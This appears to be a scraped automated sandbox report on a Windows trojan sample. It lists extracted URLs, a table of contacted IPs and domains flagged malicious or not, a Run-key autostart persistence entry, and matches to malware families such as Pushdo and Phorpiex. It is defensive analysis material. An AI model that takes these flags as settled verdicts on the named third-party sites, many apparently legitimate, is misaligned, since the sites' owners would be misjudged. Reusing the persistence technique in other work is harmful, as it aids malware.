00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-setiEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2FEwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpgEwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.serviceplan.com/presse/news.html#news2793EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.serviceplan.com/presse/news.html#news2792EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                            217.69.139.150
                                                                                                                                                                            mxs.mail.ruRussian Federation
                                                                                                                                                                            47764MAILRU-ASMailRuRUtrue
                                                                                                                                                                            67.21.93.229
                                                                                                                                                                            num6.17986.netUnited States
                                                                                                                                                                            46844ST-BGPUStrue
                                                                                                                                                                            76.74.184.61
                                                                                                                                                                            alexpope.bizCanada
                                                                                                                                                                            13768COGECO-PEER1CAfalse
                                                                                                                                                                            107.180.58.31
                                                                                                                                                                            orbitgas.comUnited States
                                                                                                                                                                            26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                            203.137.75.45
                                                                                                                                                                            okashimo.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                            153.126.211.112
                                                                                                                                                                            mikihan.comJapan7684SAKURA-ASAKURAInternetIncJPfalse
                                                                                                                                                                            217.160.0.131
                                                                                                                                                                            mackusick.deGermany
                                                                                                                                                                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                            203.210.102.34
                                                                                                                                                                            ascc.org.auAustralia
                                                                                                                                                                            7496WEBCENTRAL-ASWebCentralAUfalse
                                                                                                                                                                            3.130.204.160
                                                                                                                                                                            unknownUnited States
                                                                                                                                                                            16509AMAZON-02UStrue
                                                                                                                                                                            217.79.184.35
                                                                                                                                                                            www.tyrns.comGermany
                                                                                                                                                                            24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEfalse
                                                                                                                                                                            194.143.194.23
                                                                                                                                                                            reproar.comSpain
                                                                                                                                                                            8311REDESTELRedestel-RedesdigitalesdeTelecomunicacionenItrue
                                                                                                                                                                            5.189.171.125
                                                                                                                                                                            muhr-soehne.deGermany
                                                                                                                                                                            51167CONTABODEtrue
                                                                                                                                                                            198.49.23.144
                                                                                                                                                                            midap.comUnited States
                                                                                                                                                                            53831SQUARESPACEUSfalse
                                                                                                                                                                            83.223.113.46
                                                                                                                                                                            magicomm.co.ukUnited Kingdom
                                                                                                                                                                            29017GYRONGBtrue
                                                                                                                                                                            91.229.22.126
                                                                                                                                                                            pleszew.policja.gov.plPoland
                                                                                                                                                                            198704CSD-KGP-PL-ASBiuroLacznosciiInformatykiPLfalse
                                                                                                                                                                            5.39.75.157
                                                                                                                                                                            bosado.comFrance
                                                                                                                                                                            16276OVHFRtrue
                                                                                                                                                                            69.195.90.46
                                                                                                                                                                            rtcasey.comUnited States
                                                                                                                                                                            46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                            104.21.26.121
                                                                                                                                                                            aiolos-sa.grUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            104.21.74.141
                                                                                                                                                                            shesfit.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                            217.74.161.133
                                                                                                                                                                            cnti.krsn.ruRussian Federation
                                                                                                                                                                            16300INTERTAX-AREARUtrue
                                                                                                                                                                            83.167.255.150
                                                                                                                                                                            dzm.czCzech Republic
                                                                                                                                                                            24971MASTER-ASCzechRepublicwwwmasterczCZfalse
                                                                                                                                                                            66.226.70.66
                                                                                                                                                                            mail.airmail.netUnited States
                                                                                                                                                                            30447INFB2-ASUSfalse
                                                                                                                                                                            13.248.169.48
                                                                                                                                                                            www.findbc.comUnited States
                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                            85.128.196.22
                                                                                                                                                                            strazynski.plPoland
                                                                                                                                                                            15967NAZWAPLtrue
                                                                                                                                                                            202.254.236.40
                                                                                                                                                                            www.naoi-a.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                            81.2.194.241
                                                                                                                                                                            www.edimart.huCzech Republic
                                                                                                                                                                            24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                                                                                            13.113.204.223
                                                                                                                                                                            k-nikko.comUnited States
                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                            217.19.254.22
                                                                                                                                                                            shanks.co.ukUnited Kingdom
                                                                                                                                                                            60819SAFENAMES-ASGBtrue
                                                                                                                                                                            216.177.137.32
                                                                                                                                                                            fortknox.bmUnited States
                                                                                                                                                                            3955321P-WSSUStrue
                                                                                                                                                                            93.189.66.202
                                                                                                                                                                            ssm.chSwitzerland
                                                                                                                                                                            12347VIRTUALTECCHtrue
                                                                                                                                                                            109.71.54.22
                                                                                                                                                                            akdeniz.nlNetherlands
                                                                                                                                                                            202053UPCLOUDFIfalse
                                                                                                                                                                            219.94.129.97
                                                                                                                                                                            web-york.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                            49.212.232.113
                                                                                                                                                                            unicus.jpJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                            74.208.215.145
                                                                                                                                                                            indonesiamedia.comUnited States
                                                                                                                                                                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                            49.12.155.123
                                                                                                                                                                            adventist.roGermany
                                                                                                                                                                            24940HETZNER-ASDEfalse
                                                                                                                                                                            145.239.5.159
                                                                                                                                                                            ramkome.comFrance
                                                                                                                                                                            16276OVHFRtrue
                                                                                                                                                                            46.30.60.158
                                                                                                                                                                            ncn.deGermany
                                                                                                                                                                            15817MITTWALD-ASMittwaldCMServiceGmbHundCoKGDEfalse
                                                                                                                                                                            78.46.224.133
                                                                                                                                                                            amic.atGermany
                                                                                                                                                                            24940HETZNER-ASDEfalse
                                                                                                                                                                            34.174.61.199
                                                                                                                                                                            kewlmail.comUnited States
                                                                                                                                                                            2686ATGS-MMD-ASUStrue
                                                                                                                                                                            77.78.104.3
                                                                                                                                                                            zupraha.czCzech Republic
                                                                                                                                                                            15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                                                                                                                                            88.86.118.82
                                                                                                                                                                            deckoviny.czCzech Republic
                                                                                                                                                                            39392SUPERNETWORK_CZtrue
                                                                                                                                                                            49.212.180.178
                                                                                                                                                                            kumaden.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                            192.99.226.184
                                                                                                                                                                            s5w.comCanada
                                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                                            195.78.66.50
                                                                                                                                                                            www.photo4b.comPoland
                                                                                                                                                                            41079SUPERHOST-PL-ASPLfalse
                                                                                                                                                                            34.94.160.21
                                                                                                                                                                            www.wkhk.netUnited States
                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                            137.118.26.67
                                                                                                                                                                            fnw.usUnited States
                                                                                                                                                                            6250NEONOVA-NETUSfalse
                                                                                                                                                                            188.166.152.188
                                                                                                                                                                            www.c9dd.comNetherlands
                                                                                                                                                                            14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                            13.33.21.22
                                                                                                                                                                            d2kt7vovxa5e81.cloudfront.netUnited States
                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                            185.253.212.22
                                                                                                                                                                            karmy.com.plPoland
                                                                                                                                                                            48707GREENER-ASPLtrue
                                                                                                                                                                            210.140.73.39
                                                                                                                                                                            www.ex-olive.comJapan4694IDCFIDCFrontierIncJPfalse
                                                                                                                                                                            70.39.251.249
                                                                                                                                                                            quadlock.comUnited States
                                                                                                                                                                            54641INMOTI-1USfalse
                                                                                                                                                                            5.134.13.210
                                                                                                                                                                            nels.co.ukUnited Kingdom
                                                                                                                                                                            34282UKNOC-ASGBfalse
                                                                                                                                                                            62.122.170.171
                                                                                                                                                                            burstner.ruCzech Republic
                                                                                                                                                                            50245SERVEREL-ASNLtrue
                                                                                                                                                                            212.44.102.75
                                                                                                                                                                            oozkranj.comSlovenia
                                                                                                                                                                            43128DHH-ASSItrue
                                                                                                                                                                            104.21.42.10
                                                                                                                                                                            www.wifi4all.nlUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            172.67.152.88
                                                                                                                                                                            www.rs-ag.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            195.5.116.23
                                                                                                                                                                            enguita.netSpain
                                                                                                                                                                            39787TV2-NORWAYNOfalse
                                                                                                                                                                            203.0.113.0
                                                                                                                                                                            nme.co.jpReserved
                                                                                                                                                                            136518WA-GOVERNMENT-AS-APWAGovernmentprojectAUtrue
                                                                                                                                                                            76.223.54.146
                                                                                                                                                                            websy.comUnited States
                                                                                                                                                                            16509AMAZON-02UStrue
                                                                                                                                                                            208.100.26.245
                                                                                                                                                                            atb-lit.comUnited States
                                                                                                                                                                            32748STEADFASTUStrue
                                                                                                                                                                            185.230.63.186
                                                                                                                                                                            sokuwan.netIsrael
                                                                                                                                                                            58182WIX_COMILtrue
                                                                                                                                                                            104.21.25.200
                                                                                                                                                                            www.fcwcvt.orgUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            156.251.140.23
                                                                                                                                                                            likangds.comSeychelles
                                                                                                                                                                            40065CNSERVERSUSfalse
                                                                                                                                                                            172.67.71.13
                                                                                                                                                                            jabian.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            192.124.249.3
                                                                                                                                                                            pers.comUnited States
                                                                                                                                                                            30148SUCURI-SECUSfalse
                                                                                                                                                                            172.67.68.180
                                                                                                                                                                            canasil.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            104.21.46.148
                                                                                                                                                                            ftchat.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                            208.80.123.195
                                                                                                                                                                            gbp-jp.comUnited States
                                                                                                                                                                            16552TIGGEEUSfalse
                                                                                                                                                                            61.200.81.21
                                                                                                                                                                            yasuma.comJapan2914NTT-COMMUNICATIONS-2914UStrue
                                                                                                                                                                            192.241.158.94
                                                                                                                                                                            nunomira.comUnited States
                                                                                                                                                                            14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                            172.67.164.178
                                                                                                                                                                            clinicasanluis.com.coUnited States
                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                            172.67.189.68
                                                                                                                                                                            kavram.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            104.21.68.7
                                                                                                                                                                            dayvo.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            195.96.252.188
                                                                                                                                                                            nlcv.bas.bgBulgaria
                                                                                                                                                                            8745AS-BG-BASBGfalse
                                                                                                                                                                            104.21.24.39
                                                                                                                                                                            ifesnet.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            164.132.175.106
                                                                                                                                                                            zemarmot.netFrance
                                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                                            142.250.189.19
                                                                                                                                                                            ghs.googlehosted.comUnited States
                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                            85.233.160.146
                                                                                                                                                                            hbfuels.comUnited Kingdom
                                                                                                                                                                            8622ISIONUKNamescoLimitedGBfalse
                                                                                                                                                                            204.11.56.50
                                                                                                                                                                            mjrcpas.comVirgin Islands (BRITISH)
                                                                                                                                                                            40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                                                                            165.227.252.190
                                                                                                                                                                            crcsi.orgUnited States
                                                                                                                                                                            14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                            185.151.30.147
                                                                                                                                                                            pertex.comUnited Kingdom
                                                                                                                                                                            48254TWENTYIGBfalse
                                                                                                                                                                            103.168.172.218
                                                                                                                                                                            in1.smtp.messagingengine.comunknown
                                                                                                                                                                            7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                            185.230.63.107
                                                                                                                                                                            acraloc.comIsrael
                                                                                                                                                                            58182WIX_COMILtrue
                                                                                                                                                                            198.185.159.145
                                                                                                                                                                            riwn.orgUnited States
                                                                                                                                                                            53831SQUARESPACEUSfalse
                                                                                                                                                                            198.185.159.144
                                                                                                                                                                            refintl.orgUnited States
                                                                                                                                                                            53831SQUARESPACEUSfalse
                                                                                                                                                                            211.13.196.162
                                                                                                                                                                            unknownJapan7514MEXComputerEngineeringConsultingLtdJPtrue
                                                                                                                                                                            141.193.213.20
                                                                                                                                                                            johnlyon.orgUnited States
                                                                                                                                                                            396845DV-PRIMARY-ASN1USfalse
                                                                                                                                                                            35.172.94.1
                                                                                                                                                                            themark.orgUnited States
                                                                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                                                                            154.201.225.123
                                                                                                                                                                            revoldia.netSeychelles
                                                                                                                                                                            132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                                                                                                            195.128.140.29
                                                                                                                                                                            nettle.plPoland
                                                                                                                                                                            56590RBO-NETPLtrue
                                                                                                                                                                            76.223.35.103
                                                                                                                                                                            nrsi.comUnited States
                                                                                                                                                                            16509AMAZON-02UStrue
                                                                                                                                                                            159.89.244.183
                                                                                                                                                                            wanoa.comUnited States
                                                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                            104.26.3.124
                                                                                                                                                                            www.kernsafe.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            69.163.239.62
                                                                                                                                                                            sjbs.orgUnited States
                                                                                                                                                                            26347DREAMHOST-ASUSfalse
                                                                                                                                                                            38.111.255.201
                                                                                                                                                                            wnit.orgUnited States
                                                                                                                                                                            62550INOVADATAUStrue
                                                                                                                                                                            99.83.190.102
                                                                                                                                                                            sidepath.comUnited States
                                                                                                                                                                            16509AMAZON-02UStrue
                                                                                                                                                                            66.94.119.160
                                                                                                                                                                            www.yocinc.orgUnited States
                                                                                                                                                                            394513AWESOMENET-CORPUSfalse
                                                                                                                                                                            154.203.14.100
                                                                                                                                                                            www.mobilnic.netSeychelles
                                                                                                                                                                            135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                                                                                                                                                                            108.167.164.216
                                                                                                                                                                            aevga.comUnited States
                                                                                                                                                                            46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                            5.196.166.214
                                                                                                                                                                            www.spanesi.comFrance
                                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                                            Joe Sandbox Version:38.0.0 Ammolite
                                                                                                                                                                            Analysis ID:1322205
                                                                                                                                                                            Start date and time:2023-10-09 15:49:06 +02:00
                                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                                            Overall analysis duration:0h 10m 21s
                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                            Report type:full
                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                            Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                            Number of analysed new started processes analysed:16
                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                            Technologies:
                                                                                                                                                                            • HCA enabled
                                                                                                                                                                            • EGA enabled
                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                            Sample file name:EwK95WVtzI.exe
                                                                                                                                                                            Original Sample Name:f96c1d0accec84ab6ddca3c0bafc6cbc.exe
                                                                                                                                                                            Detection:MAL
                                                                                                                                                                            Classification:mal100.spre.troj.evad.winEXE@18/4@2394/100
                                                                                                                                                                            EGA Information:
                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                            HCA Information:
                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                            • Number of executed functions: 198
                                                                                                                                                                            • Number of non-executed functions: 219
                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 104.21.63.28, 172.67.142.169, 204.79.197.212
                                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.ottospm.com.cdn.cloudflare.net, slscr.update.microsoft.com, a-0010.a-msedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                            15:50:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                            15:50:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                            15:50:55API Interceptor2x Sleep call for process: EwK95WVtzI.exe modified
                                                                                                                                                                            15:51:11API Interceptor2x Sleep call for process: pigalicapi.exe modified
                                                                                                                                                                            15:51:24API Interceptor524748x Sleep call for process: svchost.exe modified
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            217.69.139.150OWd39WUX3D.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                              0bv3c9AqYs.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                gEkl9O5tiu.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                  CX17SY6xF6.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                    PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                      nhVJ8J5qOt.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                        fs7AQcREFX.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                          6gjnnBAbpc.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                              iJzpyjAehB.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                EksRd2mRLH.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                  rLDmqbpt5D.exeGet hashmaliciousPushdo, DanaBot, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                    d4bNCWDk1F.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousTofseeBrowse
                                                                                                                                                                                                          MYorfmVq9Z.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                              l3Qj8QhTYZ.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                                nwk9iV8lpS.exeGet hashmaliciousUnknownBrowse
